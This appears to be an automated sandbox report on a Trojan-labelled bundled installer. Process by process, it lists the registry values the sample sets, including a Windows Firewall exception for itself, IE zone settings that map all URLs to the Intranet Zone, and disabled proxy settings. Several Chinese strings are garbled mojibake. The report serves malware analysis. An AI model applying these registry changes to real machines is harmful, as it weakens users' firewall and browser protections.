[HKCU\Software\Tencent\QQBrowser\PrivateCfg]
"DisablePtLogin_740"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"VerifierFlags"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN]
"QQBrowser.exe"

The process QQBrowser.exe:2968 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 71 19 D7 07 8A 60 6E CF 08 77 33 AD 05 87 D9"

[HKCU\Software\Tencent\QQBrowser\Launch]
"LaunchOpenPageType" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process QQBrowser.exe:2496 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process QQBrowser.exe:3184 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 82 F5 11 99 6B 40 48 27 04 97 81 0A E7 11 08"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process QQBrowser.exe:3160 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process QQBrowser.exe:3164 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process QQBrowser.exe:2076 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"Version" = "0.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"EducationPage" = "educate.html"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}]
"currentVersion" = "0.0.0.0"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"Desc" = "ÃƒÂ¨Ã‚Â¾Ã‚Â¹ÃƒÂ¤Ã‚Â¸Ã…Â ÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ¨Ã‚Â¾Ã‚Â¹ÃƒÂ¨Ã‚ÂÃ…Â ÃƒÂ¥Ã‚Â¤Ã‚Â©ÃƒÂ¯Ã‚Â¼Ã…â€™QQÃƒÂ¦Ã‚ÂµÃ‚ÂÃƒÂ¨Ã‚Â§Ã‹â€ ÃƒÂ¥Ã¢â€žÂ¢Ã‚Â¨ÃƒÂ§Ã¢â‚¬ÂÃ‚Â¨ÃƒÂ¦Ã‹â€ Ã‚Â·ÃƒÂ§Ã¢â‚¬Â¹Ã‚Â¬ÃƒÂ¤Ã‚ÂºÃ‚Â«ÃƒÂ¥Ã‚Â¾Ã‚Â®ÃƒÂ¤Ã‚Â¿Ã‚Â¡ÃƒÂ§Ã¢â‚¬ÂÃ‚ÂµÃƒÂ¨Ã¢â‚¬Å¾Ã¢â‚¬ËœÃƒÂ§Ã¢â‚¬Â°Ã‹â€ "
"Name" = "ÃƒÂ¥Ã‚Â¾Ã‚Â®ÃƒÂ¤Ã‚Â¿Ã‚Â¡ÃƒÂ¨Ã‚ÂÃ…Â ÃƒÂ¥Ã‚Â¤Ã‚Â©"
"AutoUpdateDisabled" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\PluginBar]
"LightIcon" = "light.png"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"SetupStartPage" = "setup_start.html"

[HKCU\Software\Tencent\QQBrowser\Extensions]
"CommandOrder" = "2"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"SetupShell" = "1"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}]
"EducateStatus" = "1"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"RequiredMinVersion" = "7.6.0.19807"
"STYLE" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 63 CA 56 A6 B9 F9 6D 0C DD BB D9 3B 6B E5 24"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"HelpURL" = "http://browser.qq.com/new/qb7.6-wechat-intro.html"
"LogoPath" = "logo32.png"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\PluginBar]
"DarkIcon" = "dark.png"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"HomeUrl" = "http://app.browser.qq.com?id={5FD65AEB-B895-446A-915D-72B6D4886A0E}"
"ID" = "{5FD65AEB-B895-446A-915D-72B6D4886A0E}"
"ManifestVersion" = "1"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}]
"CommandOrder" = "1"

[HKCU\Software\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0]
"SetupFinishPage" = "setup_finish.html"

The process QQBrowser.exe:3300 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:228 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 38 3A 39 F6 5D AD B1 71 E6 30 77 49 0F 13 AF"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

The process fm4svr.exe:2192 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 1B C3 24 3F 05 AA F1 F7 C9 CE 12 12 E5 0C CA"

The process fm4svr.exe:348 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 5D 49 5E DA 4E F4 6F DB 72 31 29 FB 11 6D B2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process F0916_s_30911.exe:1112 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\AppID\ieCommonPlugin.DLL]
"AppID" = "{6B4447CA-C33E-4E65-914D-C7B346D73F80}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"UninstallString" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDate" = "2014-10-16"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\VersionIndependentProgID]
"(Default)" = "ieCommonPlugin.Implement"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\TypeLib]
"(Default)" = "{9A93865B-4314-47AE-8C4A-850748CCC6BF}"

[HKCR\ieCommonPlugin.Implement]
"(Default)" = "Implement Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"Version" = "1.8.0.1255"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"DisplayVersion" = "1.8.0.1255"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\iexplore\AllowedDomains\*]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"vendor" = "Beijing baidu Netcom science and technology co.ltd"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\ProgID]
"(Default)" = "ieCommonPlugin.Implement.1"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin\MimeTypes\application/np-BaiduSDDetect]
"Description" = "BaidusdDetectNPPlugin"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Path" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"Publisher" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã…â€œÃ‚Â¨ÃƒÂ§Ã‚ÂºÃ‚Â¿ÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ§Ã‚Â»Ã…â€œÃƒÂ¦Ã…Â Ã¢â€šÂ¬ÃƒÂ¦Ã…â€œÃ‚Â¯ÃƒÂ¯Ã‚Â¼Ã‹â€ ÃƒÂ¥Ã…â€™Ã¢â‚¬â€ÃƒÂ¤Ã‚ÂºÃ‚Â¬ÃƒÂ¯Ã‚Â¼Ã¢â‚¬Â°ÃƒÂ¦Ã…â€œÃ¢â‚¬Â°ÃƒÂ©Ã¢â€žÂ¢Ã‚ÂÃƒÂ¥Ã¢â‚¬Â¦Ã‚Â¬ÃƒÂ¥Ã‚ÂÃ‚Â¸"

[HKCR\ieCommonPlugin.Implement\CurVer]
"(Default)" = "ieCommonPlugin.Implement.1"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"ProductName" = "BaiduSd"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag" = "273"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\ieCommonPlugin.Implement\CLSID]
"(Default)" = "{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDir" = "%Program Files%\Baidu\BaiduSd"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}]
"(Default)" = "Implement Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"DisplayIcon" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}]
"(Default)" = "IImplement"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\AppID\{6B4447CA-C33E-4E65-914D-C7B346D73F80}]
"(Default)" = "ieCommonPlugin"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 75 78 BF 05 4C 91 74 BB 4C 1A 55 D7 0F 58 8B"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Description" = "Baidusd detect NPAPI plugin"

[HKLM\System\CurrentControlSet\Control\CrashControl]
"CrashDumpEnabled" = "2"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢]
"DisplayName" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢1.8"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"VirusTime" = "2013.11.28 0110"

[HKCR\ieCommonPlugin.Implement.1\CLSID]
"(Default)" = "{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\ieCommonPlugin.Implement.1]
"(Default)" = "Implement Class"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0]
"(Default)" = "ieCommonPlugin 1.0 Type Library"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Version" = "1.0.0.1"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\TypeLib]
"(Default)" = "{9A93865B-4314-47AE-8C4A-850748CCC6BF}"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"SupplyID" = "30911"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\InprocServer32]
"ThreadingModel" = "Apartment"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp]
"F0916_s_30911.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\F0916_s_30911.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¥Ã‚Â®Ã¢â‚¬Â°ÃƒÂ¨Ã‚Â£Ã¢â‚¬Â¦ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp]
"F0916_s_30911.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\F0916_s_30911.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¥Ã‚Â®Ã¢â‚¬Â°ÃƒÂ¨Ã‚Â£Ã¢â‚¬Â¦ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The process QQBrowser_Setup:2052 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp]
"QQBrowser_Setup_Hk_78653.exe" = "1"

[HKCU\Software\Tencent\QQBrowser\Launch]
"SkinUpdateFlag" = "1"
"AbpCalcFlag" = "1"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"SupplyID" = "78653"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"UninstallString" = "%Program Files%\Tencent\QQBrowser\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"INSTLANG" = "2052"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"DisplayVersion" = "7.7.24289.400"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"Publisher" = "ÃƒÂ¨Ã¢â‚¬Â¦Ã‚Â¾ÃƒÂ¨Ã‚Â®Ã‚Â¯ÃƒÂ§Ã‚Â§Ã¢â‚¬ËœÃƒÂ¦Ã…Â Ã¢â€šÂ¬ÃƒÂ¯Ã‚Â¼Ã‹â€ ÃƒÂ¦Ã‚Â·Ã‚Â±ÃƒÂ¥Ã…â€œÃ‚Â³ÃƒÂ¯Ã‚Â¼Ã¢â‚¬Â°ÃƒÂ¦Ã…â€œÃ¢â‚¬Â°ÃƒÂ©Ã¢â€žÂ¢Ã‚ÂÃƒÂ¥Ã¢â‚¬Â¦Ã‚Â¬ÃƒÂ¥Ã‚ÂÃ‚Â¸"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"Version" = "7.7.24289.400"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"InstallDir" = "%Program Files%\Tencent\QQBrowser"

